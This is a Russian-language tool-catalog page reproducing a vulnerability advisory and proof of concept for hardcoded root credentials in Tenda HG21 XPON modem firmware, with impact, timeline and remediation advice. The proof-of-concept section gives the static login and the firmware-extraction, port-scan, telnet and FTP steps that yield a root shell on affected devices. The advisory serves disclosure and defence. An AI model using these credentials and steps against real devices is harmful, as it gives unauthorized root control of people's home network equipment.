Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-38577-by-deepak-Anmol — Доказательство концепции, демонстрирующее жёстко заданные учётные данные root (admin/system) в прошивке модема Tenda HG21 XPON, позволяющие получить несанкционированный root-доступ через telnet и FTP. | Kitploit
Инструменты/GitHubGitHub/poxsky/cve-2026-38577-by-deepak-anmol
Безопасность встроенных системБезопасность IoTАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеБезопасность оборудования и IoTАнализ Прошивок
GitHubpoxsky/cve-2026-38577-by-deepak-anmol

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-38577-by-deepak-Anmol

Доказательство концепции, демонстрирующее жёстко заданные учётные данные root (admin/system) в прошивке модема Tenda HG21 XPON, позволяющие получить несанкционированный root-доступ через telnet и FTP.

Репозиторий
9 ч 27 мин назадЕщё не проверено

CVE-2026-38577 — Жестко заданные root-учётные данные в Tenda HG21

Сводка

ПолеЗначение
Идентификатор CVECVE-2026-38577
ПроизводительTenda
ПродуктTenda HG21 (XPON-оптический модем)
Затронутая версияV4.0.0-260302
Ключ продуктаHG21-V1.0-TDE01
Версия оборудованияV1.0
Дата сборки прошивки2026-03-02
Файл прошивкиUS_HG21re_300002982_en_xpon_2.zip
Класс уязвимостиCWE-798: Использование жестко заданных учётных данных
ИсследовательAnmol Singh Rajput — независимый исследователь безопасности
Статус раскрытияПроизводитель ещё не уведомлён на момент резервирования CVE — применяется 90-дневный срок ответственного раскрытия с даты назначения CVE

Описание

Анализ прошивки XPON-оптического модема Tenda HG21 выявил жестко заданную административную учётную запись, встроенную в поставляемый образ прошивки. Учётная запись имеет полные привилегии root (UID 0), а её учётные данные статичны на всех устройствах, что означает: любой злоумышленник, способный обратиться к открытой службе управления на уязвимом устройстве, может аутентифицироваться как root, не зная установленного пользователем пароля веб-интерфейса.

Где это было обнаружено

  • В /etc/passwd извлечённой прошивки присутствует запись admin с SHA256crypt-хешем пароля, который соответствует статическому значению system.
  • UID учётной записи — 0, то есть это и есть root, а не ограниченная служебная учётная запись.
  • Файл /etc/shadow отсутствует, поэтому слабый/статический хеш в passwd является единственным барьером, защищающим учётную запись.
  • /etc/inetd.conf запускает telnetd и ftpd, оба процесса работают от имени root, поэтому жестко заданная учётная запись доступна по сети, а не только через последовательный/UART-консоль.
  • Веб-интерфейс управления обслуживается только по обычному HTTP (без TLS), что является вторичным пробелом в защите, но само по себе не относится к CVE.

Воздействие

Злоумышленник, имеющий сетевой доступ к службам telnet (TCP/23) или FTP (TCP/21) уязвимого устройства, может войти как admin, используя статический пароль, и получить root-оболочку / доступ к файлам на уровне root. Это позволяет, как минимум:

  • Выполнение кода — root-оболочка через telnet.
  • Повышение привилегий — границы привилегий отсутствуют; учётная запись сразу работает от имени root.
  • Раскрытие информации — полный доступ к файловой системе/конфигурации, включая любые учётные данные клиентской сети, хранящиеся на устройстве.

Векторы CVSS из первоначальной заявки (оценка производителя может отличаться после публикации):

  • Вектор атаки: Сеть
  • Требуемые привилегии: Отсутствуют (учётные данные жестко заданы/известны)
  • Взаимодействие с пользователем: Отсутствует
  • Конфиденциальность / Целостность / Доступность: Высокая / Высокая / Высокая

Доказательство концепции

Это PoC на основе учётных данных — он демонстрирует, что жестко заданная учётная запись проходит аутентификацию и предоставляет root, а не эксплойт повреждения памяти. Запускайте его только против устройства, которым вы владеете или на тестирование которого у вас есть явное разрешение.

1. Подтвердите наличие учётных данных в прошивке

root@kitploit:~
# Извлеките прошивку (binwalk или инструмент производителя на ваш выбор)
binwalk -e US_HG21re_300002982_en_xpon_2.bin

# Найдите и проверьте файл passwd
find . -name passwd
cat squashfs-root/etc/passwd
# -> admin:<sha256crypt-хеш-"system">:0:0:root:/root:/bin/sh

2. Подтвердите доступность службы

root@kitploit:~
nmap -p 21,23 <target-ip>

3. Аутентифицируйтесь с помощью жестко заданной учётной записи

root@kitploit:~
telnet <target-ip>
# login: admin
# password: system
root@kitploit:~
ftp <target-ip>
# Name: admin
# Password: system

Успешный вход в любую из служб возвращает сеанс оболочки/FTP с привилегиями root (id сообщит uid=0(root)).

Устранение

  • Производителю следует полностью удалить жестко заданную учётную запись admin/system или, как минимум, принудительно задавать уникальный случайный пароль для каждого устройства при первой загрузке (не выводимый только из серийного номера).
  • Отключить telnetd/ftpd по умолчанию; требовать явного согласия и аутентифицированного зашифрованного канала (SSH/SFTP) для удалённого администрирования.
  • Обслуживать интерфейс управления только через HTTPS.
  • Ротировать статические учётные данные на уже развёрнутых устройствах через обязательное обновление прошивки и принудительно сбрасывать пароль при обновлении.

Хронология

ДатаСобытие
2026-03-02Выпущена уязвимая сборка прошивки
—Обнаружено в ходе независимого анализа прошивки
2026-04-09CVE-2026-38577 зарезервирован через MITRE
—Уведомление производителя ожидается (90-дневное окно раскрытия с момента назначения CVE)

Авторы

Обнаружено и сообщено:

  • Anmol Singh Rajput — LinkedIn
  • Deepak G — LinkedIn

Ссылки

  • https://www.tenda.com.cn
  • https://cwe.mitre.org/data/definitions/798.html
Скачать инструмент